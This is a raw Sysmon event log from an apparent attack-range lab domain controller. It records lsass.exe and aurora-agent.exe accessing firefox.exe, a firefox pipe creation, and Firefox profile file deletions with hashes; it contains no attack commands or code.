Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.782{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.782{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.782{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.781{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.781{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.781{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.781{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.781{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.780{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.780{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.780{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.780{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.780{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.780{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.779{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.779{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000048139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.777{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.4.93673048C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000048138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.687{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86346BD006A19AF08E37E00971231293,SHA256=A1ED8802465C6B63D7898040B77782996FB635040DB804016042F6203FAABE25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.656{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.656{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.656{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000048134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.637{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=96A8B77FFA55AB10EA3E9E2B07F37308,SHA256=137C9C576EB02ACED20D22195FBC2CFBD9BE37B45CC389F17F8A284B9B4C1F1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.634{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=96A8B77FFA55AB10EA3E9E2B07F37308,SHA256=137C9C576EB02ACED20D22195FBC2CFBD9BE37B45CC389F17F8A284B9B4C1F1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.632{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=DC07CD176E93E0EE1C6C4F091840CB8B,SHA256=BF350741B0963B86A0E6D70F78B3F12DA0E22933530FA6B85FE3F316D48FFAA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.631{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1CA660DB108F072C99BDC4EA24A077A0,SHA256=FB8FC135EB9626CAD9C5BD4054770FAB26C03A5D7277B464CEEE542210C4DCDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.630{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=D87FB90B1E20A5D1B386FBB10464540E,SHA256=73D7A1214932DB9A5E19D5F79FD96991A8C8B810A0C9D95EF806F6F2B608FD85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.628{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1EC6C317D532C916E90698DDE717B396,SHA256=6390DB9F9A61EF5212DD0D62B16D9B1C0242FBD7B042E3D775D9E3650CCFDFA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.627{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1EC6C317D532C916E90698DDE717B396,SHA256=6390DB9F9A61EF5212DD0D62B16D9B1C0242FBD7B042E3D775D9E3650CCFDFA5,IMPHASH=00000000000000000000000000000000falsefalse 